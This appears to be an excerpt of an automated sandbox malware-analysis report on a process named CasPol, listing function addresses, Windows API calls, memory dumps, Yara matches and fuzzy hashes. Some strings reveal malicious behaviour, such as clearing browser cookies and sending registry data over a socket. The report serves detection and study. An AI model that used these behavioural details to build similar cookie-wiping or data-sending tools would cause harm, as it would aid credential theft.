                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,00000000,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1324828854-0
                                                                                                                                                                                                                                  • Opcode ID: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                                                                                                                                  • Instruction ID: b40464c9ec282996611fef5cbd20273031f87559cdf671a411eba52403cbf28d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2a57007ecaabeafdb2dea6b541a07f99f491d21749d301156e70ae2fc22959b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DB51E270E002099FEB10CFA8D881AEEBBF8FF09300F14416BE815E3391D6749951CB6A
                                                                                                                                                                                                                                  Function 004559CA Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID: HE$HE
                                                                                                                                                                                                                                  • API String ID: 269201875-1978648262
                                                                                                                                                                                                                                  • Opcode ID: 65ff1149e5400faf749e77ee0a373f8307c7a4f77e118ae33a4d82d27c9b20c0
                                                                                                                                                                                                                                  • Instruction ID: 4134de32792d44acead4bb36f8da9b5b282593f8ffe10db144b1eaf4d9577b64
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 65ff1149e5400faf749e77ee0a373f8307c7a4f77e118ae33a4d82d27c9b20c0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90412A31A009106BEF24AABA8CD5A7F3B64DF45375F14031BFC1896293D67C8C4996AA
                                                                                                                                                                                                                                  Function 1001A6A6 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,1001AE1B,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 1001A6E8
                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 1001A763
                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 1001A77E
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 1001A7A4
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,FF8BC35D,00000000,1001AE1B,00000000,?,?,?,?,?,?,?,?,?,1001AE1B,?), ref: 1001A7C3
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,1001AE1B,00000000,?,?,?,?,?,?,?,?,?,1001AE1B,?), ref: 1001A7FC
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1324828854-0
                                                                                                                                                                                                                                  • Opcode ID: d67dbe8014b1b42e9e6d5a85cdeb93bb72044c9289cf33768a4df2c43ee6b981
                                                                                                                                                                                                                                  • Instruction ID: caa66828d063c4f57f6ca3a5c54d23115575f1b669959d2329a9049d7f1fcf44
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d67dbe8014b1b42e9e6d5a85cdeb93bb72044c9289cf33768a4df2c43ee6b981
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A5152719002499FDB10CFA4CC85BDEBBF5EF0A310F15416AE955EB291D730D992CBA1
                                                                                                                                                                                                                                  Function 00412C88 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00412CC1
                                                                                                                                                                                                                                    • Part of subcall function 004129AA: RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                                                                                                                                                    • Part of subcall function 004129AA: RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                                                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002C8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(TUFTUF,00465554,00465554,00465900,00465900,00000071), ref: 00412E31
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseEnumInfoOpenQuerysend
                                                                                                                                                                                                                                  • String ID: TUFTUF$>G$DG$DG
                                                                                                                                                                                                                                  • API String ID: 3114080316-344394840
                                                                                                                                                                                                                                  • Opcode ID: e1787cbf8325363351838095d8289317cfa6d593b82b9d8f5237fd23516fabfc
                                                                                                                                                                                                                                  • Instruction ID: 92049c6ae7fba3f13a57cd60a3827c89810429dfa6cf24b756c0ab1f01d338b1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1787cbf8325363351838095d8289317cfa6d593b82b9d8f5237fd23516fabfc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0141A2316042009BC224F635D9A2AEF7394AFD0708F50843FF94A671E2EF7C5D4986AE
                                                                                                                                                                                                                                  Function 04573370 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 0457339B
                                                                                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 045733A3
                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 04573431
                                                                                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0457345C
                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 045734B1
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                  • Opcode ID: 4d5d8015348562e82703a527721b1f3523adbcd1c5d48b0d2f45946a094fac82
                                                                                                                                                                                                                                  • Instruction ID: 81fc5039f8285a63032545adfcd60c85de7eb0138d4d6b599b66c23253e8deea
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d5d8015348562e82703a527721b1f3523adbcd1c5d48b0d2f45946a094fac82
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8941C534A00209ABCF14DF68F848A9EBBB6BF85338F148175DC156B251D735BA05FB91
                                                                                                                                                                                                                                  Function 00437A80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00437AAB
                                                                                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00437AB3
                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00437B41
                                                                                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00437B6C
                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00437BC1
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                  • Opcode ID: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                                                                                                                                                  • Instruction ID: 9404c61c081bc4e6da2099be8a52027e1297fde76841380def533d3eaa533744
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a717e1e029c36c18052b78818950a58a3847fd0af0d72a643a188b4f53f37093
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD410970A04209DBCF20EF19C844A9FBBB5AF0932CF14915BE8556B392D739EE05CB95
                                                                                                                                                                                                                                  Function 0040B6EA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                                                                                                                                    • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                                                                                                                                    • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                                                                                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040B76C
                                                                                                                                                                                                                                  • PathFileExistsA.SHLWAPI(?), ref: 0040B779
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                                                                                                                                                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                                                                                                                                                  • API String ID: 1133728706-4073444585
                                                                                                                                                                                                                                  • Opcode ID: edc7f370fecb03e9ccacb381159a67de1c7764de54bec237b8e337eb7ab9e290
                                                                                                                                                                                                                                  • Instruction ID: d844a8c095f6bc09782a4352348c5dfd082864f820bca84d12e352ec49be167e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: edc7f370fecb03e9ccacb381159a67de1c7764de54bec237b8e337eb7ab9e290
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F216D71A00109A6CB04F7B2DCA69EE7764AE95318F40013FE902771D2EB7C9A49C6DE
                                                                                                                                                                                                                                  Function 00455903 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: dfab428511212000b980b964f0fa0b3b0c66161db3c5fab27109bb8a214377e5
                                                                                                                                                                                                                                  • Instruction ID: 969edc756a0dffe936139f0dc9bce31aed38431af2e56c5058bd22e5c2f4fad6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dfab428511212000b980b964f0fa0b3b0c66161db3c5fab27109bb8a214377e5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 991124B1508654FBDB202F769C4493B3B6CEF82376B10016FFC15D7242DA7C8805C2AA
                                                                                                                                                                                                                                  Function 0040FBEF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040FBFC
                                                                                                                                                                                                                                  • int.LIBCPMT ref: 0040FC0F
                                                                                                                                                                                                                                    • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                                                                                                                                                    • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0040FC4B
                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FC71
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FC8D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                                                                                                                                  • String ID: P[G
                                                                                                                                                                                                                                  • API String ID: 2536120697-571123470
                                                                                                                                                                                                                                  • Opcode ID: 9dc93271d8ca2c5a2fe1f23905a31ea5d19b989abd63f293402e2a51e6b4ac0b
                                                                                                                                                                                                                                  • Instruction ID: a46b155a0a589d4ea75c4983af6a631921b9d9812a15003568faaf62f6f01cf1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9dc93271d8ca2c5a2fe1f23905a31ea5d19b989abd63f293402e2a51e6b4ac0b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7611F331904518A7CB14FBA5D8469DEB7689E44358B20007BF905B72C1EB7CAE45C79D
                                                                                                                                                                                                                                  Function 0457925D Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 04579221: _free.LIBCMT ref: 0457924A
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 045792AB
                                                                                                                                                                                                                                    • Part of subcall function 0457571E: HeapFree.KERNEL32(00000000,00000000,?,0457924F,?,00000000,?,00000000,?,04579276,?,00000007,?,?,04577E5A,?), ref: 04575734
                                                                                                                                                                                                                                    • Part of subcall function 0457571E: GetLastError.KERNEL32(?,?,0457924F,?,00000000,?,00000000,?,04579276,?,00000007,?,?,04577E5A,?,?), ref: 04575746
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 045792B6
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 045792C1
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04579315
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04579320
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0457932B
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04579336
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                                                                                  • Instruction ID: ad69e43a333624a25dd69832a9a1e29a9781904b3395b89d8b447dc564ba5229
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE1172B1650709FAF520F7B0EC45FCBBB9DBF84708F400838A79A76052DA24B5046661
                                                                                                                                                                                                                                  Function 0044FCDB Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0044FA22: _free.LIBCMT ref: 0044FA4B
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0044FD29
                                                                                                                                                                                                                                    • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                                                                                                                                                    • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0044FD34
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0044FD3F
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0044FD93
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0044FD9E
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0044FDA9
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0044FDB4
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                                                                                                                                  • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                                                                                                                                                                                                                                  Function 1001CD3A Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 1001CCFE: _free.LIBCMT ref: 1001CD27
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 1001CD88
                                                                                                                                                                                                                                    • Part of subcall function 10015A65: RtlFreeHeap.NTDLL(00000000,00000000,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?), ref: 10015A7B
                                                                                                                                                                                                                                    • Part of subcall function 10015A65: GetLastError.KERNEL32(?,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?,?), ref: 10015A8D
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 1001CD93
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 1001CD9E
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 1001CDF2
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 1001CDFD
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 1001CE08
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 1001CE13
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 549e4c4a2a4e32b24ac0ed4ccfac9f753f669f6257b0fba4d7754ee797346d9b
                                                                                                                                                                                                                                  • Instruction ID: 240818be63ccc3dc83c97ca6d82296bdbd890e81bd7557c088d8b4c1d65aa4e5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 549e4c4a2a4e32b24ac0ed4ccfac9f753f669f6257b0fba4d7754ee797346d9b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C112C75540B08EAD520EBB0CC46FCB779DDF04B00F880D1DB69D6E052DA79F9859B91
                                                                                                                                                                                                                                  Function 1000CFA2 Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,1000C8A0,1000A6DD,1000AAB0), ref: 1000CFB0
                                                                                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 1000CFBE
                                                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 1000CFD7
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,1000C8A0,1000A6DD,1000AAB0), ref: 1000D029
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3852720340-0
